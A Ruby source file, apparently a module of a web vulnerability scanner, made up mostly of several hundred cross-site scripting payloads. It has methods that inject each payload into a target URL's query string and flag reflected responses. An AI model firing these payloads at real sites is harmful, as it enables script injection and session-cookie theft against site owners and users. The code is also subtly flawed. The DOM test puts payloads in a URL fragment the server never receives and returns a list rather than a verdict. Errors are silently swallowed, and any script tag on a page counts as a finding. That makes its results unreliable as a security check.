require 'uri'
require_relative '../utils/network'
require_relative '../utils/colorize'

class XSS
  PAYLOADS = [
    "<script>alert('XSS')</script>",
    "<script>alert(String.fromCharCode(88,83,83))</script>",
    "<script>alert(/XSS/)</script>",
    "<script>alert(document.cookie)</script>",
    "<script>alert(document.domain)</script>",
    "<script>alert(location.href)</script>",
    "<script>alert(location.pathname)</script>",
    "<script>alert(window.name)</script>",
    "<script>alert(self.location)</script>",
    "<script>alert(parent.location)</script>",
    "<script>alert(top.location)</script>",
    "<script>alert(document.URL)</script>",
    "<script>alert(document.URLUnencoded)</script>",
    "<script>alert(document.baseURI)</script>",
    "<script>alert(document.cookie)</script>",
    "<script>alert(document.referrer)</script>",
    "<script>alert(window.location)</script>",
    "<script>alert(window.location.href)</script>",
    "<script>alert(window.location.pathname)</script>",
    "<script>alert(window.location.search)</script>",
    "<script>alert(window.location.hash)</script>",
    "<img src=x onerror=alert('XSS')>",
    "<img src=x onerror=alert(String.fromCharCode(88,83,83))>",
    "<img src=x onerror=alert(/XSS/)>",
    "<img src=x onerror=alert(document.cookie)>",
    "<img src=x onerror=alert(document.domain)>",
    "<img src=x onerror=alert(location.href)>",
    "<img src=x onerror=alert(window.name)>",
    "<img src=x onerror=alert(self.location)>",
    "<img src=x onerror=alert(parent.location)>",
    "<img src=x onerror=alert(top.location)>",
    "<img src=x onerror=alert(document.URL)>",
    "<img src=x onerror=alert(document.referrer)>",
    "<img src=x onerror=alert(window.location)>",
    "<img src=x onerror=alert(window.location.href)>",
    "<img src=x onerror=alert(window.location.pathname)>",
    "<img src=x onerror=alert(window.location.search)>",
    "<img src=x onerror=alert(window.location.hash)>",
    "<svg onload=alert('XSS')>",
    "<svg onload=alert(String.fromCharCode(88,83,83))>",
    "<svg onload=alert(/XSS/)>",
    "<svg onload=alert(document.cookie)>",
    "<svg onload=alert(document.domain)>",
    "<svg onload=alert(location.href)>",
    "<svg onload=alert(window.name)>",
    "<svg onload=alert(self.location)>",
    "<svg onload=alert(parent.location)>",
    "<svg onload=alert(top.location)>",
    "<svg onload=alert(document.URL)>",
    "<svg onload=alert(document.referrer)>",
    "<svg onload=alert(window.location)>",
    "<svg onload=alert(window.location.href)>",
    "<svg onload=alert(window.location.pathname)>",
    "<svg onload=alert(window.location.search)>",
    "<svg onload=alert(window.location.hash)>",
    "javascript:alert('XSS')",
    "javascript:alert(String.fromCharCode(88,83,83))",
    "javascript:alert(/XSS/)",
    "javascript:alert(document.cookie)",
    "javascript:alert(document.domain)",
    "javascript:alert(location.href)",
    "javascript:alert(window.name)",
    "javascript:alert(self.location)",
    "javascript:alert(parent.location)",
    "javascript:alert(top.location)",
    "javascript:alert(document.URL)",
    "javascript:alert(document.referrer)",
    "javascript:alert(window.location)",
    "javascript:alert(window.location.href)",
    "javascript:alert(window.location.pathname)",
    "javascript:alert(window.location.search)",
    "javascript:alert(window.location.hash)",
    "'\"><script>alert('XSS')</script>",
    "'\"><script>alert(String.fromCharCode(88,83,83))</script>",
    "'\"><script>alert(/XSS/)</script>",
    "'\"><script>alert(document.cookie)</script>",
    "'\"><script>alert(document.domain)</script>",
    "'\"><script>alert(location.href)</script>",
    "'\"><script>alert(window.name)</script>",
    "'\"><script>alert(self.location)</script>",
    "'\"><script>alert(parent.location)</script>",
    "'\"><script>alert(top.location)</script>",
    "'\"><script>alert(document.URL)</script>",
    "'\"><script>alert(document.referrer)</script>",
    "'\"><script>alert(window.location)</script>",
    "'\"><script>alert(window.location.href)</script>",
    "'\"><script>alert(window.location.pathname)</script>",
    "'\"><script>alert(window.location.search)</script>",
    "'\"><script>alert(window.location.hash)</script>",
    "<body onload=alert('XSS')>",
    "<body onload=alert(String.fromCharCode(88,83,83))>",
    "<body onload=alert(/XSS/)>",
    "<body onload=alert(document.cookie)>",
    "<body onload=alert(document.domain)>",
    "<body onload=alert(location.href)>",
    "<body onload=alert(window.name)>",
    "<body onload=alert(self.location)>",
    "<body onload=alert(parent.location)>",
    "<body onload=alert(top.location)>",
    "<body onload=alert(document.URL)>",
    "<body onload=alert(document.referrer)>",
    "<body onload=alert(window.location)>",
    "<body onload=alert(window.location.href)>",
    "<body onload=alert(window.location.pathname)>",
    "<body onload=alert(window.location.search)>",
    "<body onload=alert(window.location.hash)>",
    "<iframe src=javascript:alert('XSS')>",
    "<iframe src=javascript:alert(String.fromCharCode(88,83,83))>",
    "<iframe src=javascript:alert(/XSS/)>",
    "<iframe src=javascript:alert(document.cookie)>",
    "<iframe src=javascript:alert(document.domain)>",
    "<iframe src=javascript:alert(location.href)>",
    "<iframe src=javascript:alert(window.name)>",
    "<iframe src=javascript:alert(self.location)>",
    "<iframe src=javascript:alert(parent.location)>",
    "<iframe src=javascript:alert(top.location)>",
    "<iframe src=javascript:alert(document.URL)>",
    "<iframe src=javascript:alert(document.referrer)>",
    "<iframe src=javascript:alert(window.location)>",
    "<iframe src=javascript:alert(window.location.href)>",
    "<iframe src=javascript:alert(window.location.pathname)>",
    "<iframe src=javascript:alert(window.location.search)>",
    "<iframe src=javascript:alert(window.location.hash)>",
    "<input onfocus=alert('XSS') autofocus>",
    "<input onfocus=alert(String.fromCharCode(88,83,83)) autofocus>",
    "<input onfocus=alert(/XSS/) autofocus>",
    "<input onfocus=alert(document.cookie) autofocus>",
    "<input onfocus=alert(document.domain) autofocus>",
    "<input onfocus=alert(location.href) autofocus>",
    "<input onfocus=alert(window.name) autofocus>",
    "<input onfocus=alert(self.location) autofocus>",
    "<input onfocus=alert(parent.location) autofocus>",
    "<input onfocus=alert(top.location) autofocus>",
    "<input onfocus=alert(document.URL) autofocus>",
    "<input onfocus=alert(document.referrer) autofocus>",
    "<input onfocus=alert(window.location) autofocus>",
    "<input onfocus=alert(window.location.href) autofocus>",
    "<input onfocus=alert(window.location.pathname) autofocus>",
    "<input onfocus=alert(window.location.search) autofocus>",
    "<input onfocus=alert(window.location.hash) autofocus>",
    "<select onfocus=alert('XSS') autofocus>",
    "<select onfocus=alert(String.fromCharCode(88,83,83)) autofocus>",
    "<select onfocus=alert(/XSS/) autofocus>",
    "<select onfocus=alert(document.cookie) autofocus>",
    "<select onfocus=alert(document.domain) autofocus>",
    "<select onfocus=alert(location.href) autofocus>",
    "<select onfocus=alert(window.name) autofocus>",
    "<select onfocus=alert(self.location) autofocus>",
    "<select onfocus=alert(parent.location) autofocus>",
    "<select onfocus=alert(top.location) autofocus>",
    "<select onfocus=alert(document.URL) autofocus>",
    "<select onfocus=alert(document.referrer) autofocus>",
    "<select onfocus=alert(window.location) autofocus>",
    "<select onfocus=alert(window.location.href) autofocus>",
    "<select onfocus=alert(window.location.pathname) autofocus>",
    "<select onfocus=alert(window.location.search) autofocus>",
    "<select onfocus=alert(window.location.hash) autofocus>",
    "<textarea onfocus=alert('XSS') autofocus>",
    "<textarea onfocus=alert(String.fromCharCode(88,83,83)) autofocus>",
    "<textarea onfocus=alert(/XSS/) autofocus>",
    "<textarea onfocus=alert(document.cookie) autofocus>",
    "<textarea onfocus=alert(document.domain) autofocus>",
    "<textarea onfocus=alert(location.href) autofocus>",
    "<textarea onfocus=alert(window.name) autofocus>",
    "<textarea onfocus=alert(self.location) autofocus>",
    "<textarea onfocus=alert(parent.location) autofocus>",
    "<textarea onfocus=alert(top.location) autofocus>",
    "<textarea onfocus=alert(document.URL) autofocus>",
    "<textarea onfocus=alert(document.referrer) autofocus>",
    "<textarea onfocus=alert(window.location) autofocus>",
    "<textarea onfocus=alert(window.location.href) autofocus>",
    "<textarea onfocus=alert(window.location.pathname) autofocus>",
    "<textarea onfocus=alert(window.location.search) autofocus>",
    "<textarea onfocus=alert(window.location.hash) autofocus>",
    "<keygen onfocus=alert('XSS') autofocus>",
    "<keygen onfocus=alert(String.fromCharCode(88,83,83)) autofocus>",
    "<keygen onfocus=alert(/XSS/) autofocus>",
    "<keygen onfocus=alert(document.cookie) autofocus>",
    "<keygen onfocus=alert(document.domain) autofocus>",
    "<keygen onfocus=alert(location.href) autofocus>",
    "<keygen onfocus=alert(window.name) autofocus>",
    "<keygen onfocus=alert(self.location) autofocus>",
    "<keygen onfocus=alert(parent.location) autofocus>",
    "<keygen onfocus=alert(top.location) autofocus>",
    "<keygen onfocus=alert(document.URL) autofocus>",
    "<keygen onfocus=alert(document.referrer) autofocus>",
    "<keygen onfocus=alert(window.location) autofocus>",
    "<keygen onfocus=alert(window.location.href) autofocus>",
    "<keygen onfocus=alert(window.location.pathname) autofocus>",
    "<keygen onfocus=alert(window.location.search) autofocus>",
    "<keygen onfocus=alert(window.location.hash) autofocus>",
    "<video><source onerror=alert('XSS')>",
    "<video><source onerror=alert(String.fromCharCode(88,83,83))>",
    "<video><source onerror=alert(/XSS/)>",
    "<video><source onerror=alert(document.cookie)>",
    "<video><source onerror=alert(document.domain)>",
    "<video><source onerror=alert(location.href)>",
    "<video><source onerror=alert(window.name)>",
    "<video><source onerror=alert(self.location)>",
    "<video><source onerror=alert(parent.location)>",
    "<video><source onerror=alert(top.location)>",
    "<video><source onerror=alert(document.URL)>",
    "<video><source onerror=alert(document.referrer)>",
    "<video><source onerror=alert(window.location)>",
    "<video><source onerror=alert(window.location.href)>",
    "<video><source onerror=alert(window.location.pathname)>",
    "<video><source onerror=alert(window.location.search)>",
    "<video><source onerror=alert(window.location.hash)>",
    "<audio src=x onerror=alert('XSS')>",
    "<audio src=x onerror=alert(String.fromCharCode(88,83,83))>",
    "<audio src=x onerror=alert(/XSS/)>",
    "<audio src=x onerror=alert(document.cookie)>",
    "<audio src=x onerror=alert(document.domain)>",
    "<audio src=x onerror=alert(location.href)>",
    "<audio src=x onerror=alert(window.name)>",
    "<audio src=x onerror=alert(self.location)>",
    "<audio src=x onerror=alert(parent.location)>",
    "<audio src=x onerror=alert(top.location)>",
    "<audio src=x onerror=alert(document.URL)>",
    "<audio src=x onerror=alert(document.referrer)>",
    "<audio src=x onerror=alert(window.location)>",
    "<audio src=x onerror=alert(window.location.href)>",
    "<audio src=x onerror=alert(window.location.pathname)>",
    "<audio src=x onerror=alert(window.location.search)>",
    "<audio src=x onerror=alert(window.location.hash)>",
    "<details open ontoggle=alert('XSS')>",
    "<details open ontoggle=alert(String.fromCharCode(88,83,83))>",
    "<details open ontoggle=alert(/XSS/)>",
    "<details open ontoggle=alert(document.cookie)>",
    "<details open ontoggle=alert(document.domain)>",
    "<details open ontoggle=alert(location.href)>",
    "<details open ontoggle=alert(window.name)>",
    "<details open ontoggle=alert(self.location)>",
    "<details open ontoggle=alert(parent.location)>",
    "<details open ontoggle=alert(top.location)>",
    "<details open ontoggle=alert(document.URL)>",
    "<details open ontoggle=alert(document.referrer)>",
    "<details open ontoggle=alert(window.location)>",
    "<details open ontoggle=alert(window.location.href)>",
    "<details open ontoggle=alert(window.location.pathname)>",
    "<details open ontoggle=alert(window.location.search)>",
    "<details open ontoggle=alert(window.location.hash)>",
    "<marquee onstart=alert('XSS')>",
    "<marquee onstart=alert(String.fromCharCode(88,83,83))>",
    "<marquee onstart=alert(/XSS/)>",
    "<marquee onstart=alert(document.cookie)>",
    "<marquee onstart=alert(document.domain)>",
    "<marquee onstart=alert(location.href)>",
    "<marquee onstart=alert(window.name)>",
    "<marquee onstart=alert(self.location)>",
    "<marquee onstart=alert(parent.location)>",
    "<marquee onstart=alert(top.location)>",
    "<marquee onstart=alert(document.URL)>",
    "<marquee onstart=alert(document.referrer)>",
    "<marquee onstart=alert(window.location)>",
    "<marquee onstart=alert(window.location.href)>",
    "<marquee onstart=alert(window.location.pathname)>",
    "<marquee onstart=alert(window.location.search)>",
    "<marquee onstart=alert(window.location.hash)>",
    "<object data=javascript:alert('XSS')>",
    "<object data=javascript:alert(String.fromCharCode(88,83,83))>",
    "<object data=javascript:alert(/XSS/)>",
    "<object data=javascript:alert(document.cookie)>",
    "<embed src=javascript:alert('XSS')>",
    "<embed src=javascript:alert(String.fromCharCode(88,83,83))>",
    "<embed src=javascript:alert(/XSS/)>",
    "<embed src=javascript:alert(document.cookie)>",
    "<link rel=stylesheet href=javascript:alert('XSS')>",
    "<link rel=stylesheet href=javascript:alert(String.fromCharCode(88,83,83))>",
    "<link rel=stylesheet href=javascript:alert(/XSS/)>",
    "<link rel=stylesheet href=javascript:alert(document.cookie)>",
    "<style>@import'javascript:alert(\"XSS\")';</style>",
    "<style>@import'javascript:alert(String.fromCharCode(88,83,83))';</style>",
    "<style>@import'javascript:alert(/XSS/)';</style>",
    "<style>@import'javascript:alert(document.cookie)';</style>",
    "<style>body{-moz-binding:url(\"javascript:alert('XSS')\")}</style>",
    "<style>body{-moz-binding:url(\"javascript:alert(String.fromCharCode(88,83,83))\")}</style>",
    "<style>body{-moz-binding:url(\"javascript:alert(/XSS/)\")}</style>",
    "<style>body{-moz-binding:url(\"javascript:alert(document.cookie)\")}</style>",
    "<div style=background-image:url(javascript:alert('XSS'))>",
    "<div style=background-image:url(javascript:alert(String.fromCharCode(88,83,83)))>",
    "<div style=background-image:url(javascript:alert(/XSS/))>",
    "<div style=background-image:url(javascript:alert(document.cookie))>",
    "<div style=width:expression(alert('XSS'))>",
    "<div style=width:expression(alert(String.fromCharCode(88,83,83)))>",
    "<div style=width:expression(alert(/XSS/))>",
    "<div style=width:expression(alert(document.cookie))>",
    "<table background=javascript:alert('XSS')>",
    "<table background=javascript:alert(String.fromCharCode(88,83,83))>",
    "<table background=javascript:alert(/XSS/)>",
    "<table background=javascript:alert(document.cookie)>",
    "<isindex type=image src=1 onerror=alert('XSS')>",
    "<isindex type=image src=1 onerror=alert(String.fromCharCode(88,83,83))>",
    "<isindex type=image src=1 onerror=alert(/XSS/)>",
    "<isindex type=image src=1 onerror=alert(document.cookie)>",
    "<form><button formaction=javascript:alert('XSS')>",
    "<form><button formaction=javascript:alert(String.fromCharCode(88,83,83))>",
    "<form><button formaction=javascript:alert(/XSS/)>",
    "<form><button formaction=javascript:alert(document.cookie)>",
    "<math><mi//xlink:href=\"data:x,<script>alert('XSS')</script>\">",
    "<math><mi//xlink:href=\"data:x,<script>alert(String.fromCharCode(88,83,83))</script>\">",
    "<math><mi//xlink:href=\"data:x,<script>alert(/XSS/)</script>\">",
    "<math><mi//xlink:href=\"data:x,<script>alert(document.cookie)</script>\">"
  ]

  def self.test(url, payload_type = :reflected)
    vulnerable = false
    
    PAYLOADS.each do |payload|
      begin
        test_url = url.include?("?") ? "#{url}&test=#{URI.encode_www_form_component(payload)}" : "#{url}?test=#{URI.encode_www_form_component(payload)}"
        response = Network.http_request(test_url)
        next unless response
        
        if response.body.include?(payload) || response.body.include?("<script>") || response.body.include?("alert('XSS')")
          puts Colorize.red("Possible XSS vulnerability!")
          puts Colorize.yellow("Payload: #{payload}")
          vulnerable = true
        end
      rescue
      end
    end
    
    vulnerable
  end

  def self.dom_test(url)
    dom_payloads = [
      "#<script>alert('XSS')</script>",
      "#javascript:alert('XSS')",
      "#<img src=x onerror=alert('XSS')>",
      "#<svg onload=alert('XSS')>"
    ]
    
    dom_payloads.each do |payload|
      test("#{url}#{payload}")
    end
  end

  def self.full_test(url)
    {
      reflected: test(url, :reflected),
      dom: dom_test(url)
    }
  end
end

